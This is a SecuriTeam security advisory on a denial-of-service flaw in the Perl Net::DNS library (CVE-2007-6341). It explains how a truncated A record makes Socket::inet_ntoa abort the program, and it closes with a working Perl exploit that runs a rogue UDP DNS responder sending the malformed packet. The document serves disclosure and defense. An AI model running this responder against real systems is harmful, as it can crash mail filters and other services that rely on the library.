[UNIX] Net::DNS Malformed Packet DoS

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Net::DNS Malformed Packet DoS
------------------------------------------------------------------------

SUMMARY

<http://www.net-dns.org/> Net::DNS is "a DNS resolver implemented in
Perl. It allows the programmer to perform nearly any type of DNS query
from a Perl script". beSTORM's DNS Server module has been able to detect a
vulnerability in Net::DNS allows a malicious server to cause the Net::DNS
package to crash by sending it a malformed DNS response, this in turn
would cause any product using the package to crash with it.

DETAILS

Vulnerable Systems:
* Net::DNS version 0.60 build 654

It is possible to cause Net::DNS to "croak" by responding to it with a
malformed DNS response.

The croak itself doesn't allow you to overflow or execute arbitrary code,
but as it cannot be captured using normal Perl code - as with an eval()
function for example - a user of the Net::DNS package can be caused to
"crash", his program to forcefully terminate if it encounters this DNS
response.

The problem steams from the fact that:
if ($self->{"rdlength"} > 0) {
$self->{"address"} = inet_ntoa(substr($$data, $offset, 4));
}

found in Net/DNS/RR/A.pm

Doesn't properly verify that $$data has 4 bytes to read before attempting
to substr - which in turn causes the data sent to inet_ntoa to not have
enough bytes which causes this code:
ip_address = SvPVbyte(ip_address_sv, addrlen);
if (addrlen == sizeof(addr) || addrlen == 4)
addr.s_addr =
(ip_address[0] & 0xFF) << 24 |
(ip_address[1] & 0xFF) << 16 |
(ip_address[2] & 0xFF) << 8 |
(ip_address[3] & 0xFF);
else
croak("Bad arg length for %s, length is %d, should be %d",
"Socket::inet_ntoa", addrlen, sizeof(addr));

To issue a "croak" - causing the perl to abort.

Severity:
The vulnerability itself doesn't pose any problem as Socket::inet_ntoa
handles it as expected, seriousness of this vulnerability is caused by the
fact that several other packages such as SpamAssassin and OTRS rely on
Net::DNS for resolving hostnames - this could at the very least be a
nuisance where an attacker can crash the daemons run by these two
programs.

Vendor status:
We have reported this issue to Net::DNS 6 weeks ago:
<https://rt.cpan.org/Public/Bug/Display.html?id=30316> Security issue with
Net::DNS::Resolver, but no response has been received.

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6341>
CVE-2007-6341

Exploit:
#!/usr/bin/perl
# Beyond Security(c)
# Vulnerability found by beSTORM - DNS Server module

use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die
"socket: $@";
print "Awaiting UDP messages on port $PORTNO\n";

my $oldmsg =
"\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61".
"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03".
"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79".
"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00".
"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62".
"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f".
"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03".
"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69".
"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e".
"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01".
"\x00\x01\x00\x00\x00\x01\x00\x01\x41";
while ($sock->recv($newmsg, $MAXLEN)) {
my($port, $ipaddr) = sockaddr_in($sock->peername);
$hishost = gethostbyaddr($ipaddr, AF_INET);
print "Client $hishost said ``$newmsg''\n";
$sock->send($oldmsg);
$oldmsg = "[$hishost] $newmsg";
}
die "recv: $!";

ADDITIONAL INFORMATION

The information has been provided by beSTORM.
The original article can be found at:
<http://www.beyondsecurity.com/bestorm_overview.html>

http://www.beyondsecurity.com/bestorm_overview.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.